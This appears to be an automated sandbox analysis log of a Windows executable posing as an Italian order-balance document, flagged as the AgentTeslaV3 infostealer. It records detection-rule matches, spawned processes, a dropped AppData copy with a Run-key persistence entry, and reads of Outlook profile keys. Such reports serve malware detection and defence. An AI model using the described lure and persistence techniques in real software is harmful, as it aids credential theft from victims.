                  Source: 11.0.InstallUtil.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.csLarge array initialization: .cctor: array initializer size 11689
                  Source: 11.0.InstallUtil.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.csLarge array initialization: .cctor: array initializer size 11689
                  Source: 11.2.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.csLarge array initialization: .cctor: array initializer size 11689
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 14.2.Vajejvz.exe.4009990.1.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3799970.1.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 13.2.Vajejvz.exe.3509990.2.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 14.2.Vajejvz.exe.4009990.1.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 14.2.Vajejvz.exe.3f89970.3.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 13.2.Vajejvz.exe.3489970.1.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 13.2.Vajejvz.exe.3509990.2.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: 0.3.Controllo saldo 30% Ordine 5667.exe.3819990.2.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_0251C2D40_2_0251C2D4
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_0251E6380_2_0251E638
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_0251E62B0_2_0251E62B
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_04C432100_2_04C43210
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_04C443480_2_04C44348
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_04C4C3240_2_04C4C324
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_04C4CDCC0_2_04C4CDCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010DF08011_2_010DF080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010DF3C811_2_010DF3C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010D612011_2_010D6120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010DF3BD11_2_010DF3BD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F8004011_2_05F80040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F81FF811_2_05F81FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F8C8F811_2_05F8C8F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F8BBB811_2_05F8BBB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E068011_2_063E0680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E170811_2_063E1708
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E0E2011_2_063E0E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E4A9011_2_063E4A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E86B011_2_063E86B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E16A811_2_063E16A8
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_0070C2D413_2_0070C2D4
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_0070E63813_2_0070E638
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_0070E62913_2_0070E629
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072BC2E013_2_072BC2E0
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072B004013_2_072B0040
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072B408413_2_072B4084
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072B003A13_2_072B003A
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_074386B913_2_074386B9
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_0140C2D414_2_0140C2D4
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_0140E62914_2_0140E629
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_0140E63814_2_0140E638
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_053473D814_2_053473D8
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_07CBC2E014_2_07CBC2E0
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_07CB408414_2_07CB4084
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_07CB004014_2_07CB0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 05F85A60 appears 53 times
                  Source: Controllo saldo 30% Ordine 5667.exeBinary or memory string: OriginalFilename vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.556467264.0000000003C9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWbjlanbz.dll" vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000000.424676531.0000000000222000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebless.exe> vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564525300.000000000276A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWbjlanbz.dll" vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565049458.0000000002853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKgVTQsKSwkyCvsLYHXVMqlQbtyqFlPhlnjvq.exe4 vs Controllo saldo 30% Ordine 5667.exe
                  Source: Controllo saldo 30% Ordine 5667.exeVirustotal: Detection: 28%
                  Source: Controllo saldo 30% Ordine 5667.exeReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeFile read: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeJump to behavior
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe"
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe"
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeFile created: C:\Users\user\AppData\Roaming\AabvlngefJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/3@2/2
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_01
                  Source: 11.0.InstallUtil.exe.400000.2.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 11.0.InstallUtil.exe.400000.2.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 11.0.InstallUtil.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 11.0.InstallUtil.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 11.0.InstallUtil.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 11.0.InstallUtil.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeCode function: 0_2_04C4CC87 push ss; retn 0004h0_2_04C4CC8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010D84E8 push esp; retn 0002h11_2_010D84E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010D2741 push es; retn 0002h11_2_010D2742
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010D2F10 push cs; retn 0002h11_2_010D2F12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_010D3B4F push ss; retn 0002h11_2_010D3B52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F89710 push A4056C89h; retf 02AEh11_2_05F89B4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_05F8F70B push ecx; ret 11_2_05F8F70C
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072A7972 push 74065CDDh; retf 13_2_072A798D
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072B1777 push 8B000001h; iretd 13_2_072B177C
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 13_2_072B654C push cs; iretd 13_2_072B654F
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_07CB1777 push 8B000001h; iretd 14_2_07CB177C
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeCode function: 14_2_07CB6546 push cs; iretd 14_2_07CB654F
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeFile created: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VajejvzJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VajejvzJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
